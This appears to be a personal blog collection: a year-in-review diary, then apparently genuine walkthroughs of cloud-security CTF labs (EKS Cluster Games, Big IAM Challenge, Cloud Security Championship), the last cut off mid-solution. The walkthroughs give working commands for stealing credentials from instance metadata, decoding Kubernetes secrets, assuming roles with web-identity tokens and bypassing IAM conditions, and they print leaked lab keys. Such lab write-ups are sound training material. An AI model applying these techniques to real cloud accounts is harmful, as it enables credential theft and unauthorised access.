Actually i always give a title for every year by a chapter as mark to remind me wtf is happen in that year.

Well, well, well. It is very tough journey when i recall that years, but somehow i survived, lol. -glad-

I know my english not that good, but you know that it is so much comfortable to use foreign language when talk about our feelings. Cause it is less embarrassing, at least for me.

I do know where to start, so i just write whatever i remember.

Got Hospitalized

Exactly today last year, this happen to me.

It is just a lifetime experience. In the middle of night around to 2 AM, i go to hospital alone by myself using bike while endure the pain in my upper belly (?), later i know it called heartburn (huh?).

Well, during that moment i can’t helped by laughing at myself. like wtf is this, i’ve no idea at all. And the timing too, i a bit afraid like the hospital is closed because it is around new year holiday (?)

I even post it as a joke new achievement unlocked, lmao.

It is not just happen once, but like 2 or 3 times after that, like once a month and every time it happen i just ah, shit! here we go again, lol.

Every time i visit the hospital the doctor just gimme a little injection, wait for a while the the pain is gone. They said it is probably just like gerd . But, i doubt it. Cause come on man, i don’t think i am have such a problem with eating.

Tldr; it is not a gerd , ikr! And it is revealed after i got hospitalized. Well, what an experience! -shocked-

My Kisah Died

Well, it is a my laptop. lmao

But, not just a laptop it is my kisah -cry-

And the sentence Teknisi sudah mengusahakan maximal feel emotional and dramatic for me -sobbing-

I’ve dreamed that kind of laptop for so long, like literally browsing it in internet then watch the review on youtube, etc. Then saying when yh every time ☹️

I still remember the first time i got it. Like how can i forgot the day when my dream come true!

The my first reaction at the time finally i can have it felt unreal, like still can’t process anything. I even don’t use it immediately the day i buy it, because my mental is not ready enough 👉👈

The day after, while i start to using it my hand so shaky and i even got cold sweat. I just very nervous to use it. 👉👈

Thank you for all the beautiful memories we’ve been through together, dear my kisah~

On screen Experience

Though, i spend most of the time in life just in front of screen especially alone in my room, but most of the time idk what i’m doing time just flies by, lmao.

Well, i won’t talk about that any further. Instead i’ll talk about game, movies, anime, etc that i experience from screen.

Ofc, i play games. most of the i play valorant, though i hardstuck on gold, lmao.

Here some stats from flashback, yes i’m nAts wanna be. lol

Play with my bestie 😎 (just ignore the ign)

Aside from valorant, there is another notable games i played this year. And for the first time i buy game at full price, cause usually i buy games at the cheapest price like after 70-90% discount, lol.

Is it worth the price? Hell yeah.

First game is Split Fiction, i could say i buy it cause i FOMO, because at that time i watched game’s review they say the game so good. Then when streamer play it, they seemed to really enjoy it, lmao.

It is a co-op game that you need to play with your friend, i play it with my lil bro. I think we enjoy playing it but not finished yet, i think just 2/3 level left. Anybody want to play with me? Just hmu 👉👈

What i can say about the game is absolute cinema ✋😮🤚

Like you play multiple games inside one game, because as each level changes the character you play and the theme of the world changes.

The storyline is straight-forward, you don’t need to explore that much to find any collectible or leveling your character to finish the game. Personally, i like it because it feel like we don’t need to put too much energy to play. Just grab your controller and enjoy the game.

Second game is the one and only, this year GOTY that in total win 9 categories in The Game Award! Clair Obscur: Expedition 33

What i can say about the game is truly an amazing work of art ✋😭🤚

The gameplay, the story, and music is all 10/10.

For me it is not overrated at all, All the praise and achievements are well deserved.

I really love the story which is themed about how to deal with grief, can’t count how many time i cried while playing the game. -sobbed-

But, there is a thing. That was first time experience for me to cried and then immediately need to focus again to fight the boss that can 1 hit killed my character, lol. Annoying but worth to experience.

My favorite cut scene ofc the Lune Speech (spoiler edit) that gave me goosebumps.

My favorite music are the boss soundtrack Une vie à t'aimer and Une vie à peindre (both spoiler edit).

I also love the art style, which feels very French, with flowers and the Eiffel Tower. They are french developer anyway.

For the gameplay itself, i feel the developer gave us freedom to craft our own playstyle to finish the game. Like we can follow the story first or go to explore, focus on crazy one-shot build or just want to rely on parry only, just play casual or hardcore, etc.

Already too much glazing, lmao.
Well, last thing. I choose Maelle ending. 🙂

This section already so long, lol.

Let’s continue with movies. I’ll try to keep it short

Alright, start with Sore: Wife from the future which i could say has similar theme with Clair Obscur: Expedition 33 about how to deal with grief. Yeah, i cry a lot again. -sobbed-

Both of them also has 3 act, Sore has Jonathan, Sore, Waktu and COE33 has Gustave, Verso, Maelle. So i can’t helped but connected each others.

I know the movies has sci-fi side about time-looping, time-looping, the parallel worlds. But, tbh idc at all about it while i watched the movie. I really focus about the relationship between the Sore and Jonathan.

There is 3 scene that i remember got me.

1. Sore nosebleed, then she start the looping : Like how big her love to Jonathan? until she still want to choose Jo over and over again. Especially if we assume every time she looping, she feel the pain of death. Damn. Jika aku harus menjalani sepuluh ribu kehidupan, aku akan selalu memilihmu. Easier said than done, especially in real life. I was there before, and portraying Sore as myself past. Suddenly my tears flowed. -cry-

2. Whenever you ready. I’m here : Sore back to Jo after she gave up and go away. Then she realize all she need to do just stay by Jo side, no need to force him to do anything. Just give him trust, accept him, and genuinely be present for him. I wish i was Jo, that has Sore. -cry-

3. Finally the meet : Well, yap that’s the peak. Finally Jo find his longing. -sobbed-

Next, Tinggal Meninggal the movie not much hyped like Sore. But, the movie got many achievement at JAFF!

Definitely the movies is that good!

Not much i could say, but i really like their dark joke and Gema it is just portrayed of me. lmao.

Last, My Beloved Stranger (知らないカノジョ) japanese movie which starring Milet it is her first movie >_<

Her acting was so good! The Song she sang in the movie really touched my heart, especially the one at the end.

As i remembered the story about sacrifice that you wont realize it until you experienced yourself. Then after you understand how much she sacrificed for you, would you still force her to choose you? more or less the story goes like that. The ending really got me, again. -sobbed-

Well, there is many more movies, but think 3 is already too much.

Okay, last anime series. Only contains new title, not a sequel.

In short, i will just write the title and my opinion about it.

1. Orb: On the Movements of the Earth : The literacy is a miracle, because it can connecting minds across time. The freedom to access all learning materials is such a blessing, especially now when we can find anything in internet. Compared to back then when. we had to go far just to get a piece of knowledge.

2. Gachiakuta: Anime about thrash, typical shounen anime. But the background story feel fresh for me. The ability is also feel unique, it is come from the object that you really cared.

Well, I think only two new title anime i watched this year. The rest is just sequel. lmao

Event and Looting

Well, well, well. Event, activity that still excite me. At least force me to out and touch the grass. lmao

Finally this year, i can go to Comifuro. Yeay

As this is my first event, i really focus on looking around the booth. Looking for something interest me.

But, tbh the signal very bad. Cannot meet anyone there, i just feel so tired in crowd alone. Arrive at 11 then i decide to back at 4 pm and I only attend day 1.

Second time i go to Comifuro, i’m not alone

Well, this time i arrive at 8 am even join to count down open gate, and back around 6 pm. Since i’m not alone mentally i feel less tired in the crowd, and it is so much fun.

Most of the looting is just keychain and stickers, but there is some notable book/comic. I’ll also put the artist instagram. The looting combined from both comifuro i attend.

Sick artstyle artprint by Nestvirgo (ph)

School-themed comics, the art and story so good. Some part even touch my heart while reading it by fortecomics

Both has very good art style and story, the comic still continues.

Left: worldwithoutsleep

Right: dnkhamida_

Conan fanart, well it is a kid tho by arutaego04

I think there is the time when you see their art somewhere. Or just me? The SUN project by mimisannn33

Next, another event i attend is one piece orchestra by rumahorkestrajogja

Feel so nostalgic with old song and touched by the beautiful melody from the orchestra.

Next year they planned to do Singeki No Kyoujin themed orchestra 👀

Dandadan themed cafe by akihabaracafe.id

Hope next year they do frieren themed cafe 👀

Last, the g2g festival (last dance they said) by g2gfestival

I used to go concert, but it is postponed. Among all country in their Asia tour, the only postponed country is Indonesia. Whyyy 😭😭😭

But One Ok Rock (their vocalist are siblings) wanna come back again next year??

Come on guys, try to listen their song. From first album until the latest one their song still that damn good. 😭😭😭

Meeting Many People

Guess, at this age where usually we meet our friends? Yep, at their wedding party. lmao

It seems like this year is the most weddings I've attended. ._.

Well, usually i can’t attend that much. Because usually it is on Jabodetabek, which is just too far. But this year, many of the timing just perfect so i can attend it.

It was fun, to meet again my friends after a long time and have a small talk.

Tbh it was first time i felt genuinely happy, i mean i always happy whenever my friends got married. But, there is always the feeling like when yh or like ak jg mw that kind of feeling. -gloomy-

But, now i just chillin’ enjoy everything happen to me and this

Anyway despite of weebs-related event, i also attend another event or i can call it conference?. But, ofc the main purpose to attend it to meet friends and make new friends.

At first i do really scared af to approach new person, but i just do it anyway and turns out is not as scared as i imagine. -glad-

Maybe it is effect of recently i start to watch you know something like pov extrovert ? the video that show pov of we approach the strangers and start a small talk? and it is really courage me to start to do it too.

Idk if it went well or not. But, i feel i start to enjoy small talk. Such an improvement for me. Yeay -glad-

Though i still need a time to recover after some intense interaction like that. It’ll always draining my energy ._.

Another occasion i meet many people is when zerobyte invite me join the gath. Well, we’ve been interacting each other virtually, but never been spending many time in-person.

That was very fun to talk we them, sharing different pov and experience. Really learn a lot from them, thank you for having me!

Also thank you for inviting me to join the project so i can make a joke awal taun dirawat pake bpjs akhir taun bikin soal buat bpjs . lmao

Last, the proudest moment of the year is when i can qualify to the final CTF and attend it! Because it is like one of my dream, go to another city to compete. -proud-

After very long time participating in CTF, qualified to final and can’t attend it. Finally this is it!

I know i won't win, but you know i just want to attend it and experience the atmosphere.

Well, at first i doubt there is someone i know. Because no one on the qualified nickname i familiar with.

But, when meet in-person some of it i know. like we’ve been followed each other in socmed, even in the past we’ve compete each other. So, same similarity in terms of experience (?) or they are my friend's friend. Which make us easy to start to talk. -glad-

Maybe it just 2 days, but it is very memorable for me. Thank you for everyone i met there, who was kind to me. Look how happy he is 😊

I think i already yapping too long, i can’t even remember what i talking about at the beginning. lmao

I don’t know you are you and why you read it all until this point.

Whoever are you, thank you very much for take care of me. 😊

This year very exceptional for me, so many different emotion i experienced. Feeling reconnected to this world and starting to think about continuing to live because it's not that bad.

It is because all of you, every person i’ve met this year no exception, that make feel accepted and existed. 😊

Love you all very emuaaaccch. 🥰😘
Hope we’ve meet again on another occasion. 😊

Lychnobyte - 2025

Cover Illustration source https://www.pixiv.net/en/artworks/128345987

Helloo every-nyan ≽^•⩊•^≼

Yet another post talk about cloud security challenges! This time specifically about kubernetes cluster that deployed using AWS EKS!

The challenge still up and running at https://eksclustergames.com/

This platform also using wargames style with 5 level challenges!

So, without further ado let’s start to solve those challenges!

1. Secret Seeker

First challenge description

Jumpstart your quest by listing all the secrets in the cluster. Can you spot the flag among them?

and kubernetes permission

{
    "secrets": [
        "get",
        "list"
    ]
}

Well, pretty straightforward we just need to list and get secrets inside the kubernetes cluster.

Just run these command in web shell

kubectl get secrets
kubectl get secrets log-rotate -oyaml

There is one secrets log-rotate and when we read it contain flag variable with base64 encoded string.

To decode the flag you can just run this one-line command

kubectl get secrets log-rotate -ojsonpath='{.data.flag}' | base64 -d

2. Registry Hunt

Second challenges

A thing we learned during our research: always check the container registries.

For your convenience, the crane utility is already pre-installed on the machine.

with kubernetes permission

{
    "secrets": [
        "get"
    ],
    "pods": [
        "list",
        "get"
    ]
}

Now we can only get secrets but we can list and get pods. So, i assume we need to know the exact secrets name from pod spec. Because secrets can attached to a pod.

Run command below to find that secrets name

kubectl get pod
kubectl get pod database-pod-2c9b3a4e -oyaml

As we can see there is secrets that used as authentication for pulling image in imagePullSecrets section named registry-pull-secrets-780bab1d

Lets’s check that secrets

kubectl get secret registry-pull-secrets-780bab1d -oyaml

Yap, it is a secrets that stored credential for authentication to image registry.

To retrieve credential in plaintext use command below

kubectl get secret registry-pull-secrets-780bab1d -ojsonpath='{.data.\.dockerconfigjson}' | base64 -d && echo
kubectl get secret registry-pull-secrets-780bab1d -ojsonpath='{.data.\.dockerconfigjson}' | base64 -d | jq '.auths["index.docker.io/v1/"].auth' | tr -d '"' | base64 -d && echo

The credential pattern is <user>:<password>

Login with that credential using crane then pull the image that used in running pod

crane auth login docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo
crane pull eksclustergames/base_ext_image ./chall2.tar

Then extract the image .tar file to obtain flag.txt

3. Image Inquisition

Third challenge

A pod's image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret.

Remember: You are running inside a compromised EKS pod.

and kubernetes permission

{
    "pods": [
        "list",
        "get"
    ]
}

Alright, i think we need to work with container image again. Let’s retrieve the image that running pod using.

Well, pretty long image name and there is no imagePullSecrets value been set like previous challenge.

So, how to authenticate to ecr registry? Well, as mentioned description we are inside compromised EKS pod. We can get some credentials using IMDS just like how usually we did inEC2

Get AWS credentials using command below

curl http://169.254.169.254/latest/meta-data/placement/region
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole

Set the credentials using export

export AWS_DEFAULT_REGION=<region>
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>

Then login to ECR registry using password that can be retrieve using aws cli .

Well, you can easily do that with this one-line

aws ecr get-login-password | crane auth login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com

Then get the image digest layer to get flag using command below

crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 | jq .

4. Pod Break

Forth challenge

You're inside a vulnerable pod on an EKS cluster. Your pod's service-account has no permissions. Can you navigate your way to access the EKS Node's privileged service-account?

Please be aware: Due to security considerations aimed at safeguarding the CTF infrastructure, the node has restricted permissions

without any kubernetes permission :(

But we can still retrieve AWS credentials using IMDS then set using export just like in previous challenge

# Get credential using IMDS
curl http://169.254.169.254/latest/meta-data/placement/region
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole

# Set credential using export
export AWS_DEFAULT_REGION=us-west-1
export AWS_ACCESS_KEY_ID=ASIA2AVYNEVMS7TN4SNY
export AWS_SECRET_ACCESS_KEY=4Kcs7G5L/JmbJdCr/e1+ee3qV0REcXWtUJBiLEVr
export AWS_SESSION_TOKEN=FwoGZXIvYXdzEI7//////////wEaDOoKIiUxvoQ0UIHjqyK3AXpAMgQHXeU5+PYF2kWqz88dQeCt0kZyzSh/USYSS8mDlWf04eQvumTbwR5gsyYZ6dZ0qQEyGqBoSMdto7udPz7h6raQ3nQ0Mnkn1O3CkyzD1xrLSNqV6MHQ9ljLSwW5jDYlHAKlWvnG5tAu1wLxTDMpeFMD5fXePA3nu97hxQ4Bap/ljIag7JmGjpsXXwjWlRjotVc8zfZC+VIcnPDFdv2qDyuxS+5Ozw2wvN+MaO6f8MVrkq5TASiQh6PEBjIt9xsnEa8adysXLHJUJxePXNjaisKb9+za5CeTXndhlanXjim+X19LJA6KDbLl

We can using our aws credential to generate token for accessing kubernetes cluster. But, before that we need to know cluster-name to do that.

Well, cluster-name usually stored in kubectl config in ~/.kube/config file.

Cluster name is localcfg , ok now we can generate our token using command below

aws eks get-token --cluster-name localcfg

Then using that token as our authentication for kubectl to access the kubernetes cluster

kubectl --token $TOKEN auth can-i --list

Well, well, well. The token doesn’t seems work :/

Ok, maybe the cluster name we use is wrong.

Let’s check our current aws credential, maybe there is a hint

aws sts get-caller-identity

Based on the IAM role name above we can guess the cluster name probably eks-challenge-cluster.

aws eks get-token --cluster-name eks-challenge-cluster
kubectl --token $TOKEN auth can-i --list

Alright, now token is working. Yeay

Well, we got permission list and get on resource pods, secrets and serviceaccount.

Let’s check secrets because usually flag are stored there.

kubectl --token $TOKEN get secret
kubectl --token $TOKEN get secret node-flag -oyaml
kubectl --token $TOKEN get secret node-flag -ojsonpath='{.data.flag}' | base64 -d

Yap, the flag is there

5. Container Secrets Infrastructure

The last challenge

You've successfully transitioned from a limited Service Account to a Node Service Account! Great job. Your next challenge is to move from the EKS to the AWS account. Can you acquire the AWS role of the s3access-sa service account, and get the flag?

And we got the IAM Policy

{
    "Policy": {
        "Statement": [
            {
                "Action": [
                    "s3:GetObject",
                    "s3:ListBucket"
                ],
                "Effect": "Allow",
                "Resource": [
                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
                ]
            }
        ],
        "Version": "2012-10-17"
    }
}

Trust policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
                }
            }
        }
    ]
}

Kubernetes permission

{
    "secrets": [
        "get",
        "list"
    ],
    "serviceaccounts": [
        "get",
        "list"
    ],
    "pods": [
        "get",
        "list"
    ],
    "serviceaccounts/token": [
        "create"
    ]
}

Well, this last challenges give us a bunch of permissions!

Let’s start from listing kubernetes resources.

There is no pod and secret, only serviceaccount then what’s the point of giving us those permissions? lol

Anyway, let’s see what kind of serviceaccount we have

There is 3 serviceaccount

1. default → default serviceaccount in namespace, nothing to do with this

2. debug-sa → dummy serviceaccount, attached with some aws role

3. s3access-sa → seems serviceaccount that mentioned in challenges description. It has challengeEksS3Role too.

Let’s try generate token from s3access-sa serviceaccount

Oops, it’s forbidden. Seems like we don’t have permissions to do that. Instead, we can generate token from debug-sa serviceaccount only.

Well, actually we can use that debug-sa since we has trust policy to assume role we just use same method like in previous big iam challenge.

So, just need to generate token from debug-sa but since there is condition check to assume role we need to add option --audience “sts.amazonaws.com” when generate the token.

kubectl create token debug-sa --audience "sts.amazonaws.com"
aws sts assume-role-with-web-identity --role-session-name challenge5 --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --web-identity-token $TOKEN

We set AWS credentials we’ve got, then access the flag

export AWS_DEFAULT_REGION=<region>
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<Token>

aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag -

That’s it! We solve all challenges!

And as usual after solve all challenges we can got certificate like this

Reference:

• https://securitylabs.datadoghq.com/articles/amazon-eks-attacking-securing-cloud-identities/#pivoting-to-the-cloud-environment-by-stealing-pod-identities

• https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-2-from-k8s-clust

Cover Illustration source https://www.pixiv.net/en/artworks/104049290

Hello all, let’s continue to solve another cloud security challenges!

This opportunity i’ll write solution for challenges in The Big IAM challenge platform. The challenges still up and running can access at https://thebigiamchallenge.com/.

The platform only has 6 simple AWS challenges with wargames style which is we need to solve the challenge in sequence from 1 to 6.

Since all the challenges i could say pretty simple and straightforward so i decide to post all solution in one post only.

Let’s start to solve those challenges!

1. Buckets of Fun

First challenge description

We all know that public buckets are risky. But can you find the flag?

and we got aws IAM policy like this.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}

So, basically we can get all object inside thebigiamchallenge-storage-9979f4b s3 bucket and list object inside files directory.

Access the s3 bucket using browser using s3 bucket url pattern http://<bucket-name>.s3.amazonaws.com. In our case the url http://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com

As we can see there is object files/flag1.txt. Just open it using browser to get the flag

2. Google Analytics

Continue to second challenge

We created our own analytics system specifically for this challenge. We think it's so good that we even used it on this page. What could go wrong?

Join our queue and get the secret flag.

and AWS IAM policy like this

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}

Well, the challenge description say it clearly that we just need to join the queue to get the flag!

To receive the message in the provided queue we can use this command

aws sqs receive-message --queue-url <queue-url>

Sqs queue url pattern in aws is https:/<queue-endpoint>/<account-id>/<resource-name>.

Queue endpoint for each region are listed in this documentation https://docs.aws.amazon.com/general/latest/gr/sqs-service.html.

Account id for this challenge is 092297851374 and resource name is wiz-tbic-analytics-sqs-queue-ca7a1b2.

So, sqs queue url for this challenge is https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2.

We just need to run this command in platform provided web shell

aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

Then just access the url from message body to get the flag.

3. Enable Push Notifications

Continue to third challenge

We got a message for you. Can you get it?

and AWS IAM policy like this

{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}

Now we need to subscribe to SNS topic to receive the flag. But, there is some filter that the receiver url need to end with string @tbic.wiz.io.

My approach is to create webhook with endpoint @tbic.wiz.io. To have full control with the webhook, i use ngrok and create python webhook with flask.

Well, you can also use some webhook service out there in the internet.

Here the webhook script i use.

from flask import Flask, request, jsonify
import requests
import json

app = Flask(__name__)

@app.route('/webhook@tbic.wiz.io', methods=['POST'])
def webhook():
    msg_data = json.loads(request.data.decode())

    msg_type = msg_data['Type']

    if msg_type == 'SubscriptionConfirmation':
        subscribe_url = msg_data['SubscribeURL']
        print(f"[+] Confirming subscription: {subscribe_url}")
        try:
            response = requests.get(subscribe_url)
            print(f"[+] Subscription confirmed: HTTP {response.status_code}")
        except Exception as e:
            print(f"[!] Failed to confirm subscription: {e}")
            return "Failed", 500

    elif msg_type == 'Notification':
        message = msg_data['Message']
        print(f"[+] Notification received: {message}")

    else:
        print(f"[!] Unsupported message type: {msg_type}")

    return jsonify({'status': 'ok'}), 200

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

Then run the ngrok . (for the setup you can follow the steps official documentation)

ngrok http http://localhost:5000
python3 webhook.py

Then you have endpoint that can be use as sns endpoint.

Now we just need to run this command in web shell to subscribe the sns topic and wait a while to webhook receive the flag.

aws sns subscribe \
    --topic-arn "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications" \
    --protocol https --notification-endpoint https://45c2275ab043.ngrok-free.app/webhook@tbic.wiz.io

That’s it we got the third flag

4. Admin only?

Next to forth challenge

We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?

and AWS IAM policy like this

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}

The IAM policy structure looks similar with the first challenge the different just additional filter to list bucket objects that make sure the request need to come from user/admin.

Seems like the filter is good but is ForAllValues:StringLike operator is bypass-able.

As written in aws documentation https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html#reference_policies_condition-multi-valued-context-keys

The ForAllValues qualifier tests whether the value of every member of the request context matches the condition operator that follows the qualifier. The condition returns true if every context key value in the request matches a context key value in the policy. It also returns true if there are no context keys in the request.

So, basically if our request not have context PrincipalArn or any credentials our request will be allowed to access s3 bucket objects.

To make request without any credentials loaded we use option --no-sign-request

--no-sign-request (boolean)

Do not sign requests. Credentials will not be loaded if this argument is provided.

Then just run command below to list and get flag.

aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files --no-sign-request
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt - --no-sign-request

5. Do I know you?

Fifth challenge

We configured AWS Cognito as our main identity provider. Let's hope we didn't make any mistakes.

and AWS IAM policy like this

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}

As description said that the platform use AWS Cognito as identity provider, i assume this page also use AWS Cognito too. Also because in this challenge page load a picture that seems kinda suspicious.

So, let see the page source code (if using chrome use ctrl + u) we see this javascript code

<script src="https://sdk.amazonaws.com/js/aws-sdk-2.719.0.min.js"></script>
<script>
  AWS.config.region = 'us-east-1';
  AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
  // Set the region
  AWS.config.update({region: 'us-east-1'});

  $(document).ready(function() {
    var s3 = new AWS.S3();
    params = {
      Bucket: 'wiz-privatefiles',
      Key: 'cognito1.png',
      Expires: 60 * 60
    }

    signedUrl = s3.getSignedUrl('getObject', params, function (err, url) {
      $('#signedImg').attr('src', url);
    });
});
</script>

Well, the page retrieve AWS credentials from Cognito pools then stored in AWS.config.credentials variable. Since it is javascript code, we can get that credentials from web console.

Then open the web console (if using chrome use F12 the choose console tab)

To get the AWS credentials type this line in console

AWS.config.credentials.accessKeyId
AWS.config.credentials.secretAccessKey
AWS.config.credentials.sessionToken

Then open local terminal (because in web shell we cannot set AWS credentials) to configure AWS cli to use the credentials. In linux open file ~/.aws/credentials then write this line

[bigiam]
aws_access_key_id = <access-id>
aws_secret_access_key = <secret-id>
aws_session_token = <session-token>

Then access the S3 bucket to get the flag

aws --profile bigiam s3 ls s3://wiz-privatefiles/
aws --profile bigiam s3 cp s3://wiz-privatefiles/flag1.txt -

6. One final push

Last challenge!

Anonymous access no more. Let's see what can you do now.

Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role

and AWS IAM policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}

Last challenge is using Cognito again and now we got access to assume with web identity.

So, all we need to do is get the identity from Cognito

aws cognito-identity get-id --region us-east-1 --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

Get the JWT with identity we got before

aws cognito-identity get-open-id-token --region us-east-1 --identity-id us-east-1:157d6171-ee06-cefb-6881-51ea5f1b6a9d

Then we can assume role in description with our JWT to get AWS credentials

aws sts assume-role-with-web-identity --role-session-name challenge-6 --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --web-identity-token <JWT>

Just like previous challenge create credentials in our local terminal, then with that profile list s3 bucket.

aws --profile bigiam6 s3 ls
aws --profile bigiam6 s3 ls s3://wiz-privatefiles-x1000
aws --profile bigiam6 s3 cp s3://wiz-privatefiles-x1000/flag2.txt -

Well, there is many S3 bucket listed i checked one by one then found flag in wiz-privatefiles-x1000 bucket.

That’s it! We solve all challenges!

After solve all challenges we can got certificate like this

Reference:

• https://docs.aws.amazon.com/general/latest/gr/sqs-service.html

• https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-single-vs-multi-valued-context-keys.html#reference_policies_condition-multi-valued-context-keys

Cover Illustration source https://www.pixiv.net/en/artworks/91119415

Hello folks! Let’s talk again about cloud security challenges!

This time i’ll write about my solution for challenge in Cloud Security Championship platform. The platform and the challenge are still up you access here at https://cloudsecuritychampionship.com. So, basically the platform will release 1 challenge per month for 1 whole year so there will be a total of 12 challenges.

Fyi, the challenges author is Scott Piper. The one that also created the infamous flaws.cloud and flaws2.cloud. If you not check it yet, better visit it now. It is like wargames ctf for cloud security along with complete guide step by step suitable for beginner who just start solving cloud security challenges.

Alright, now let’s start to solve first released challenges in June called Perimeter Leak. Here the challenge description.

After weeks of exploits and privilege escalation you've gained access to what you hope is the final server that you can then use to extract out the secret flag from an S3 bucket.

It won't be easy though. The target uses an AWS data perimeter to restrict access to the bucket contents.

Good luck!

Also we got some message in web terminal console

You've discovered a Spring Boot Actuator application running on AWS: curl https://ctf:88sPVWyC2P3p@challenge01.cloud-champions.com {"status":"UP"}

In challenge page you got challenge description and web terminal console like this. So, you can actually just solve the challenge using that terminal but i won’t use that.

Let’s start from accessing the url using web browser, we only get response Welcome to the proxy server.

Since we know that the application using Spring Boot Actuator we can try to accessing some endpoint that commonly misconfigured like /actuator/mappings. That shows all the MVC controller mappings, basically show all endpoint that available and how it is configured.

Yeah, we got list of endpoint along with details configuration for each endpoint.

Let’s scroll down all the way to find some useful endpoint.

There is 2 endpoint that seems useful to me:

1. /actuator/env → show environment variable value

2. /proxy → endpoint that accept url parameter

First, let’s see the environment variable endpoint. Scroll down to systemEnvironment section.

From information above we know that our application is running on top of EC2 server. We also find BUCKET variable which probably our S3 bucket target named challenge01-470f711.

Next, check proxy endpoint. If you access endpoint directly with url parameter empty we got an error like this.

So, let’s try to fill url with something like https://google.com

We got another error message. Now we know that the proxy only accept IP address or domain with amazonaws.com string in it.

Since we know that the application running on top of EC2 maybe we can try to access metadata endpoint to get some credentials?

Try to fill url parameter with http://169.254.169.254/latest/meta-data/ to access EC2 metadata.

